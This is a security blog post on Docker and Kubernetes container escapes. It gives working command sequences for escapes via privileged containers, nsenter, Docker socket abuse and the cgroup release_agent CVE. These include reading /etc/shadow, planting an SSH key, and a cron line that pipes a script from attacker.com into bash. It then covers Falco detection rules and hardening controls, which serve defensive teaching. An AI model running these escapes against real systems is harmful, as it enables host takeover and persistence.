Containers are not virtual machines. This is one of the most consequential misunderstandings in modern infrastructure security. Where a virtual machine has a full hypervisor isolation layer separating guest and host kernels, a container shares the host kernel directly. The isolation that makes containers lightweight — Linux namespaces and cgroups — is also what makes them escapable when misconfigured or when vulnerabilities are present.

This post examines how container isolation works at the kernel level, walks through the primary escape vectors with working demonstrations, covers real CVEs that enabled escapes, and provides a concrete detection and hardening framework.

How Container Isolation Works

A container is, at its core, a process (or group of processes) on the host with a restricted view of the system. That restriction is implemented through three kernel mechanisms:

Linux Namespaces

Namespaces partition global system resources so that each container sees its own isolated instance:

NamespaceIsolates
pidProcess IDs — container processes cannot see host processes
netNetwork interfaces, routing tables, iptables rules
mntFilesystem mount points
utsHostname and domain name
ipcSystem V IPC, POSIX message queues
userUser and group IDs (remapped)
cgroupCgroup root directory (added in kernel 4.6)

A container escape fundamentally involves gaining access to the host’s root namespace — the namespace context shared by all host processes.

Control Groups (cgroups)

Cgroups limit resource consumption (CPU, memory, disk I/O, network) for process groups. They do not provide security isolation but they are critical for container functionality.

Linux Capabilities

Root on Linux is not monolithic. The kernel divides root’s traditional privileges into discrete capabilities: CAP_NET_BIND_SERVICE, CAP_SYS_ADMIN, CAP_CHOWN, etc. Docker drops many capabilities by default but retains a set sufficient for typical application use. The key attack surface: any capability that enables interaction with the host kernel in dangerous ways.

Escape Vector 1: Privileged Container

The most common and straightforward escape path is a container run with --privileged or with privileged: true in its Kubernetes pod spec.

Attack Flow

  1. Attacker gains code execution inside a privileged container (RCE via web app vulnerability, supply chain attack on container image, etc.)
  2. Container process can access all host devices via /dev
  3. Attacker mounts the host filesystem by identifying and mounting the host’s root disk
 1# Step 1: Confirm we're in a privileged container
 2cat /proc/1/status | grep CapEff
 3# CapEff: 0000003fffffffff  (all capabilities enabled = privileged)
 4
 5# Step 2: Identify the host disk device
 6fdisk -l 2>/dev/null | grep "^Disk /dev/sd"
 7# or: lsblk
 8
 9# Step 3: Mount host root filesystem
10mkdir /tmp/hostfs
11mount /dev/sda1 /tmp/hostfs
12
13# Step 4: Chroot into host filesystem for full interactive access
14chroot /tmp/hostfs /bin/bash
15
16# Now we have a root shell on the host filesystem
17cat /etc/shadow
18ls /root/
19crontab -l  # read host cron jobs
20
21# Step 5: Persistence — add SSH key to host root
22mkdir -p /tmp/hostfs/root/.ssh
23echo "ssh-rsa AAAA...attacker_key..." >> /tmp/hostfs/root/.ssh/authorized_keys
24
25# Or write a host-level cron job
26echo "* * * * * root curl http://attacker.com/shell | bash" >> /tmp/hostfs/etc/crontab

Alternative: Privileged + nsenter

1# Use nsenter to enter host namespaces directly
2# PID 1 on the host is visible from a privileged container
3nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
4
5# This drops you into a bash shell in ALL host namespaces
6# Equivalent to running bash directly on the host
7hostname  # shows host hostname, not container hostname
8ps aux    # shows all host processes

Escape Vector 2: Docker Socket Mount

When /var/run/docker.sock is mounted inside a container, any process in that container can talk to the Docker daemon — which runs as root on the host with full container management authority.

This is extremely common in CI/CD pipelines (Jenkins, GitLab Runner, Drone) that mount the Docker socket to enable “Docker-in-Docker” builds.

Attack Flow

  1. Attacker gains code execution inside a container with /var/run/docker.sock mounted
  2. Docker CLI (or HTTP API via curl/python) is used to create a new container
  3. The new container is started with privileged mode and the host filesystem mounted
  4. Attacker executes commands in the new container to interact with the host
 1# Step 1: Verify Docker socket is available
 2ls -la /var/run/docker.sock
 3# srw-rw---- 1 root docker /var/run/docker.sock
 4
 5# Step 2: If Docker CLI is not available, use curl with Unix socket
 6curl --unix-socket /var/run/docker.sock http://localhost/version
 7
 8# Step 3a: Docker CLI approach — spawn privileged container with host fs
 9docker run -v /:/hostfs -it --privileged alpine chroot /hostfs /bin/bash
10
11# Step 3b: API approach using curl (no docker CLI required)
12# Create container
13curl --unix-socket /var/run/docker.sock \
14  -H "Content-Type: application/json" \
15  -d '{
16    "Image": "alpine",
17    "Cmd": ["/bin/sh", "-c", "chroot /hostfs cat /etc/shadow"],
18    "HostConfig": {
19      "Binds": ["/:/hostfs:rw"],
20      "Privileged": true
21    }
22  }' \
23  -X POST http://localhost/containers/create?name=escape
24
25# Start the container and get output
26curl --unix-socket /var/run/docker.sock \
27  -X POST http://localhost/containers/escape/start

Escape Vector 3: CVE-2019-5736 (runc Binary Overwrite)

CVE-2019-5736, discovered by Adam Iwaniuk and Borys Popławski, allowed a malicious container to overwrite the host runc binary and achieve code execution as root on the host.

Affected versions: runc < 1.0-rc6, Docker < 18.09.2, containerd < 1.0.3

Vulnerability mechanism: During docker exec, runc opens /proc/self/exe (which points to the runc binary on the host) via a symlink in the container filesystem. By controlling when and how this symlink resolves, the container can write to the host runc binary while it is being executed.

Conceptual Attack Flow

  1. Attacker creates a malicious container image with a custom init binary that replaces itself with a symlink to /proc/self/exe at the right moment
  2. When docker exec is invoked on the container, runc opens the symlink
  3. The container replaces the symlink target with a write-open to /proc/self/exe
  4. The container writes a malicious payload over the runc binary on the host
  5. On the next container exec, the malicious binary runs as root on the host
 1# Detection: check runc version
 2runc --version
 3# runc version 1.0-rc6+ (patched) should show >= 1.0-rc6
 4
 5# Check Docker version (includes runc version)
 6docker version | grep -A5 "Server:"
 7
 8# Verify runc binary integrity
 9sha256sum $(which runc)
10# Compare against known-good hash from distribution vendor

Patch released: February 11, 2019. CVSS: 8.6.

Escape Vector 4: CVE-2022-0492 (cgroup v1 release_agent)

This vulnerability abused the release_agent feature in cgroup v1. When a cgroup becomes empty (all processes exit), the kernel executes the script specified in release_agent as root in the host namespace.

Conditions required for exploitation:

  • Container must have CAP_NET_ADMIN capability or be able to mount cgroup filesystems
  • cgroup v1 must be in use (not cgroup v2)
  • User namespaces must be available
 1# Step 1: Check if cgroup v1 is available and we can mount it
 2cat /proc/1/cgroup | head -5
 3# If output shows legacy cgroup paths (e.g., /sys/fs/cgroup/memory), cgroup v1 is active
 4
 5# Step 2: Create a new cgroup hierarchy with a release_agent
 6mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp
 7mkdir /tmp/cgrp/x
 8
 9# Step 3: Set up the release_agent to write host root access
10echo 1 > /tmp/cgrp/x/notify_on_release
11host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
12echo "$host_path/exploit" > /tmp/cgrp/release_agent
13
14# Step 4: Write the payload that runs on the host
15cat > /exploit << 'EOF'
16#!/bin/sh
17ps aux > /output
18chmod 777 /output
19EOF
20chmod a+x /exploit
21
22# Step 5: Trigger cgroup empty notification by starting and killing a process
23sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs && exit"
24
25# Step 6: Read the output file that was written by the host-level release_agent
26cat /output  # Contains host process listing

Patch released: February 2022, kernel 5.17-rc3. CVSS: 7.8.

Real Incident: Docker Daemon Exposed Over TCP

In 2019, multiple cryptocurrency mining campaigns (tracked by Palo Alto Unit 42 and Aqua Security) exploited Docker daemons that had been configured to listen on TCP port 2375 without TLS authentication — a configuration explicitly warned against in Docker documentation but commonly found in development environments.

Attack pattern:

  1. Masscan/Shodan enumeration for port 2375 open on the internet
  2. Connection to unauthenticated Docker API: curl http://target:2375/containers/json
  3. Deploy a new container with host / mounted
  4. Install cryptocurrency miner (XMRig) as a persistent host process via cron or systemd

Aqua Security estimated over 400 honeypot hits per day at the peak of these campaigns in 2019. Similar attacks targeting exposed Kubernetes API servers ran in parallel.

Detection with Falco

Falco is the de facto standard for runtime security monitoring of containers. It uses eBPF or kernel module probes to detect syscall-level anomalies.

 1# /etc/falco/rules.d/container-escape.yaml
 2
 3# Detect privileged container creation
 4- rule: Create Privileged Container
 5  desc: Detect creation of a privileged container
 6  condition: >
 7    container.id != host
 8    and evt.type = container
 9    and container.privileged = true
10  output: >
11    Privileged container started (user=%user.name command=%proc.cmdline
12    container_id=%container.id image=%container.image.repository)
13  priority: WARNING
14  tags: [container, privilege-escalation, T1611]
15
16# Detect Docker socket access from within a container
17- rule: Docker Socket Accessed from Container
18  desc: Detect access to Docker socket from inside a container
19  condition: >
20    open_write
21    and container
22    and fd.name = /var/run/docker.sock
23  output: >
24    Docker socket accessed inside container (user=%user.name
25    command=%proc.cmdline container=%container.name)
26  priority: CRITICAL
27  tags: [container, escape, T1611]
28
29# Detect nsenter execution (namespace escape tool)
30- rule: nsenter Executed in Container
31  desc: Detect nsenter used to enter host namespaces
32  condition: >
33    spawned_process
34    and container
35    and proc.name = nsenter
36  output: >
37    nsenter executed in container (user=%user.name args=%proc.args
38    container=%container.name pid=%proc.pid)
39  priority: CRITICAL
40
41# Detect mount of host /proc or /dev
42- rule: Sensitive Host Filesystem Mounted
43  desc: Detect mounting of sensitive host paths
44  condition: >
45    spawned_process
46    and container
47    and proc.name = mount
48    and (proc.args contains "/proc" or proc.args contains "/dev" or proc.args contains "/sys")
49  output: >
50    Sensitive host filesystem mounted in container
51    (command=%proc.cmdline container=%container.name)
52  priority: CRITICAL

Audit Log Monitoring

 1# Kubernetes audit log: detect privileged pod creation
 2# Query audit logs for pods with privileged security context
 3cat /var/log/kubernetes/audit.log | \
 4  python3 -c "
 5import sys, json
 6for line in sys.stdin:
 7    try:
 8        event = json.loads(line)
 9        if event.get('verb') in ['create', 'update'] and \
10           event.get('objectRef', {}).get('resource') == 'pods':
11            spec = event.get('requestObject', {}).get('spec', {})
12            for container in spec.get('containers', []):
13                sc = container.get('securityContext', {})
14                if sc.get('privileged'):
15                    print(f\"ALERT: Privileged pod: {event.get('objectRef',{}).get('name')} by {event.get('user',{}).get('username')}\")
16    except:
17        pass
18"
19
20# Check Docker daemon audit logs (if auditd is configured)
21ausearch -k docker --interpret | grep -E "privileged|/var/run/docker.sock"

Defense and Hardening

Control 1: Rootless Docker

1# Install rootless Docker (requires uidmap package)
2dockerd-rootless-setuptool.sh install
3
4# Verify rootless operation
5docker info | grep "rootless"
6# Should show: rootless: true
7
8# Add to environment
9export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock

Control 2: Seccomp Profiles

Seccomp (Secure Computing Mode) restricts which syscalls a container process can make. The default Docker seccomp profile blocks ~44 syscalls. Apply stricter profiles:

 1# Apply the default seccomp profile explicitly
 2docker run --security-opt seccomp=/etc/docker/seccomp-default.json myapp
 3
 4# Use a custom profile that additionally blocks mount
 5cat > /etc/docker/seccomp-restricted.json << 'EOF'
 6{
 7  "defaultAction": "SCMP_ACT_ERRNO",
 8  "syscalls": [
 9    {
10      "names": ["mount", "umount2", "pivot_root", "clone"],
11      "action": "SCMP_ACT_ERRNO"
12    }
13  ]
14}
15EOF

Control 3: AppArmor / SELinux

 1# Verify AppArmor is active for Docker
 2docker info | grep -i apparmor
 3# Should show: Security Options: apparmor
 4
 5# Apply a custom AppArmor profile
 6cat > /etc/apparmor.d/docker-no-escape << 'EOF'
 7#include <tunables/global>
 8profile docker-no-escape flags=(attach_disconnected,mediate_deleted) {
 9  #include <abstractions/base>
10  deny mount,
11  deny /proc/sysrq-trigger rwklx,
12  deny /proc/mem rwklx,
13  deny /proc/kcore rwklx,
14  deny /sys/** wklx,
15}
16EOF
17apparmor_parser -r /etc/apparmor.d/docker-no-escape
18docker run --security-opt apparmor=docker-no-escape myapp

Control 4: Drop Capabilities and Read-Only Root Filesystem

 1# Run with minimal capabilities and read-only filesystem
 2docker run \
 3  --cap-drop ALL \
 4  --cap-add NET_BIND_SERVICE \
 5  --read-only \
 6  --tmpfs /tmp \
 7  --security-opt no-new-privileges \
 8  myapp
 9
10# Equivalent Kubernetes pod spec
11cat << 'EOF'
12securityContext:
13  runAsNonRoot: true
14  runAsUser: 1000
15  allowPrivilegeEscalation: false
16  readOnlyRootFilesystem: true
17  capabilities:
18    drop:
19      - ALL
20    add:
21      - NET_BIND_SERVICE
22EOF

Control 5: OPA Gatekeeper Policy

 1# Gatekeeper ConstraintTemplate to block privileged containers
 2apiVersion: templates.gatekeeper.sh/v1beta1
 3kind: ConstraintTemplate
 4metadata:
 5  name: k8spspprivilegedcontainer
 6spec:
 7  crd:
 8    spec:
 9      names:
10        kind: K8sPSPPrivilegedContainer
11  targets:
12    - target: admission.k8s.gatekeeper.sh
13      rego: |
14        package k8spspprivilegedcontainer
15        violation[{"msg": msg}] {
16          container := input.review.object.spec.containers[_]
17          container.securityContext.privileged == true
18          msg := sprintf("Container %v must not run as privileged", [container.name])
19        }
20---
21apiVersion: constraints.gatekeeper.sh/v1beta1
22kind: K8sPSPPrivilegedContainer
23metadata:
24  name: psp-privileged-container
25spec:
26  match:
27    kinds:
28      - apiGroups: [""]
29        kinds: ["Pod"]

MITRE ATT&CK Mapping

  • T1611 — Escape to Host: Adversaries may break out of a container to gain access to the host operating system.
  • T1610 — Deploy Container: Deploy a malicious container into a compromised environment to facilitate escape.
  • T1552.007 — Container API: Access container runtime APIs to gather credentials or escalate privileges.

References